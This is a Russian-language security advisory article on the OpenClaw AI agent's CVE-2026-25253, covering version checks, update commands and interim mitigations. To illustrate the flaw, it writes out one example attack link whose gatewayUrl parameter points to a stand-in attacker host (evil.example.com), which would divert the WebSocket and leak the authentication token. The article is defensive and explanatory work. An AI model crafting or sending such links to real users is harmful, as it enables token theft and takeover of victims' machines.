infoclaw.ru
  • Подборки
  • ИИ-агенты
  • Код с ИИ ▾
    • Вайб-кодинг
    • Claude Code
    • MCP-серверы
    • Для разработчиков
    • Сравнения
  • OpenClaw ▾
    • Что такое OpenClaw
    • Установка
    • Навыки
    • Ошибки и решения
    • Интеграции
    • Безопасность
    • Сценарии использования
    • Enterprise
    • Hermes Agent
  • Свой ИИ ▾
    • Локальный ИИ
    • Доступ из России
    • Цены и подписки
  • Обучение ▾
    • Обучение нейросетям
    • ИИ в профессии
    • Как сделать
  • Материалы ▾
    • Новости
    • Разборы
    • Глоссарий
FAQ
  1. Главная
  2. Безопасность
  3. CVE-2026-25253: критическая уязвимость OpenClaw и как защититься
Безопасность

CVE-2026-25253: критическая уязвимость OpenClaw и как защититься

CVE-2026-25253 (CVSS 8.8) позволяла перехватить токен аутентификации одним кликом. Как проверить версию OpenClaw и обновиться до безопасного релиза.

Степан Ноянов · 18 марта 2026 г. · 4 мин чтения
CVE-2026-25253: критическая уязвимость OpenClaw и как защититься

В этом материале

  1. Что произошло: CVE-2026-25253 в OpenClaw
  2. Таблица CVE в OpenClaw 2026 года
  3. Как проверить версию OpenClaw
  4. Временные меры до обновления
  5. Почему 12 800 экземпляров остались непропатченными
  6. Вывод

Что произошло: CVE-2026-25253 в OpenClaw

18 марта 2026 года исследователи зафиксировали, что более 12 800 экземпляров OpenClaw по-прежнему уязвимы к атаке, описанной в CVE-2026-25253, — несмотря на то что патч вышел ещё в конце января. Эта уязвимость получила оценку CVSS 8.8 и считается наиболее опасной из раскрытых в начале 2026 года.

Суть проблемы: Control UI OpenClaw принимал параметр gatewayUrl напрямую из query-строки URL — без какой-либо валидации. Злоумышленник мог сформировать ссылку вида:

http://localhost:3000/?gatewayUrl=ws://evil.example.com/ws

Один клик по такой ссылке — и WebSocket-соединение OpenClaw переадресовывалось на сервер атакующего. В момент установки соединения передавался токен аутентификации. Итог: полный контроль над машиной жертвы без какого-либо взаимодействия пользователя, кроме перехода по ссылке.

Уязвимость обнаружили и описали специалисты SonicWall, runZero и Immersive Labs; материал получил широкое освещение на Dark Reading.


Таблица CVE в OpenClaw 2026 года

Патч версии 2026.1.29 закрыл сразу несколько критических проблем. В 2026 году было зафиксировано более 100 CVE для OpenClaw; ниже — наиболее серьёзные из известных на дату публикации:

CVECVSSОписание
CVE-2026-252538.8Перехват WebSocket через неvalидированный gatewayUrl
CVE-2026-247638.8Инъекция команд в Docker sandbox через небезопасную обработку PATH
CVE-2026-284669.4Критическая уязвимость (детали раскрыты частично)
CVE-2026-284749.3Критическая уязвимость
CVE-2026-283919.2Критическая уязвимость
CVE-2026-284469.2Критическая уязвимость

Полный трекер CVE доступен на GitHub: jgamblin/OpenClawCVEs.

Обратите внимание: CVE-2026-24763 (CVSS 8.8) закрывалась тем же патчем 2026.1.29 и связана с небезопасной обработкой переменной PATH в Docker-окружении — злоумышленник мог выполнить произвольные команды внутри sandbox.


Как проверить версию OpenClaw

Шаг 1. Найдите текущую версию

Откройте интерфейс OpenClaw, перейдите в Settings → About или выполните в терминале:

openclaw --version

Если вы используете Docker-образ, проверьте тег запущенного контейнера:

docker ps --format "table {{.Image}}\t{{.Names}}"

Шаг 2. Сравните с безопасным релизом

Минимально безопасная версия — 2026.1.29. Если у вас более ранний релиз — система уязвима к CVE-2026-25253 и CVE-2026-24763.

Шаг 3. Обновите OpenClaw

Способ обновления зависит от метода установки:

Установка через Desktop App: Откройте меню → Check for Updates. Либо скачайте актуальный релиз с официального сайта OpenClaw.

Установка через npm:

npm update -g openclaw

Docker:

docker pull openclaw/openclaw:latest
docker compose down && docker compose up -d

Подробнее об установке — в материале Установка OpenClaw на Windows и руководстве Первый запуск OpenClaw.


Временные меры до обновления

Если немедленное обновление невозможно, примите следующие меры:

  1. Не переходите по ссылкам, содержащим параметр gatewayUrl в URL OpenClaw-интерфейса.
  2. Ограничьте доступ к порту Control UI на уровне файрвола — разрешите только 127.0.0.1.
  3. Отключите удалённый доступ к интерфейсу, если он не нужен.
  4. Проверьте активные сессии и при подозрении на компрометацию немедленно отозвите токены.

Также рекомендуем изучить общие вопросы прав доступа в статье Разрешения и доступ в OpenClaw.


Почему 12 800 экземпляров остались непропатченными

По данным мониторинга от 18 марта 2026, через полтора месяца после выхода патча уязвимы оставались тысячи инсталляций. Причины типичны:

  • Автообновления отключены или работают нестабильно.
  • Инсталляции через Docker не обновляются без явной команды pull.
  • Часть пользователей не отслеживает бюллетени безопасности OpenClaw.
  • Корпоративные окружения требуют тестирования перед обновлением.

Ситуацию усугубляет то, что OpenClaw по умолчанию открывает интерфейс на внешний адрес — подробнее об этом риске читайте в разделе Приватность и локальный запуск.


Вывод

CVE-2026-25253 — наглядный пример атаки с минимальным порогом входа: жертве достаточно перейти по ссылке. Обновление до версии 2026.1.29 устраняет эту угрозу, однако общий ландшафт CVE в OpenClaw в 2026 году остаётся напряжённым — четыре уязвимости с CVSS 9.0+ зафиксированы только за первый квартал.

Включите автообновления, следите за трекером jgamblin/OpenClawCVEs и настройте сетевую изоляцию согласно рекомендациям из статьи Разрешения и доступ в OpenClaw.

Внедрение под ключ

Настроим вашего ИИ-агента и доведём до работы

Разворачиваем агента на вашей инфраструктуре: модель, доступы, память, навыки и каналы связи. Вы получаете рабочего цифрового сотрудника, а не набор инструкций.

  • OpenClaw, Hermes, n8n и связки с LLM
  • Работа на ваших серверах и ключах
  • Документация и передача проекта
🛡️ Официальный договор и NDA 💼 Данные в вашем контуре ⚡ Пилот 5–7 дней

Бесплатная консультация и смета

Расскажите задачу — предложу архитектуру и оценю сроки. Отвечает Степан Ноянов.

Или напишите сразу напрямую в Telegram: @noystem ↗

Теги: CVEуязвимостьбезопасностьобновлениеCVSSWebSocketтокен

Вам также может быть интересно

Безопасность

Приватность и безопасность OpenClaw: локальный запуск без облака

18 марта 2026 г. 6 мин
Безопасность

Права доступа в OpenClaw: как настроить безопасные разрешения

18 марта 2026 г. 7 мин
💰
Инструмент Калькулятор стоимости AI-моделей Сравните цены GPT-5.4, Claude и Gemini за минуту
→
🎯
Квиз · 2 мин Какой OpenClaw подходит вам? 5 вопросов — персональная рекомендация
→

Популярное

  1. ИИ-агент для 1С: что можно подключить и с чего начать ИИ-агенты
  2. Как пользоваться Claude Code: первый день + 6 ошибок Claude Code
  3. Вайбкодинг с чего начать: инструкция + 6 ошибок новичка Вайб-кодинг
  4. Вайб-кодинг в 1С: 6 инструментов + где цикл разомкнут Вайб-кодинг
  5. Ошибки OpenClaw: 7 групп + что проверять в каждой Ошибки и решения

Категории

  • Что такое OpenClaw (8)
  • Установка (16)
  • Навыки (25)
  • Интеграции (15)
  • Сравнения (17)
  • Сценарии использования (23)
  • Новости (121)
  • Enterprise / NemoClaw (15)
  • Безопасность (10)
  • Для разработчиков (5)
  • Ошибки и решения (71)
  • Доступ из России (6)
  • Локальный ИИ (9)
  • ИИ-агенты (24)
  • Разборы (93)
  • Hermes Agent (10)
  • MCP-серверы (37)
  • Нейросети: цены и доступ (21)
  • Как сделать (42)
  • Обучение (4)
  • Глоссарий (12)
  • Claude Code (11)
  • Вайб-кодинг (11)
  • ИИ в профессии (4)

Недавнее

  • Как страховать суперинтеллект: зачем нужны стандарты и ответственность для ИИ-агентов сегодня
  • Почему амбициозные проекты на ИИ-агентах иногда не срабатывают: уроки от крупных компаний сегодня
  • Jev — модель мгновенных решений без генерации текста: быстрее и дешевле LLM вчера

Быстрый старт

Новичок в OpenClaw? Начните отсюда:

  • → Что такое OpenClaw
  • → Установка за 10 минут
  • → Топ-10 навыков
  • → Подключить Telegram

Теги

установканавыкиtelegramwhatsappmacoswindowsenterpriseголосopen-sourcellmprivacynode.js
infoclaw.ru

Независимый информационный ресурс об ИИ-агенте OpenClaw. Статьи, гайды и новости на русском языке.

Разделы

  • Вайб-кодинг
  • Claude Code
  • MCP-серверы
  • Что такое OpenClaw
  • Установка
  • Навыки
  • Интеграции
  • Сравнения
  • Enterprise
  • ИИ в профессии
  • Цены и подписки
  • Новости

Интеграции

  • Telegram
  • WhatsApp
  • Slack
  • Discord
  • iMessage
  • Teams
  • Matrix
  • Все (20+) →

Ресурсы

  • Вопросы и ответы
  • Глоссарий
  • Для разработчиков
  • Разборы
  • Карта сайта

© 2026 infoclaw.ru — Независимый ресурс. Не является официальным сайтом проекта OpenClaw.

О проекте Автор Политика конфиденциальности Пользовательское соглашение Контакты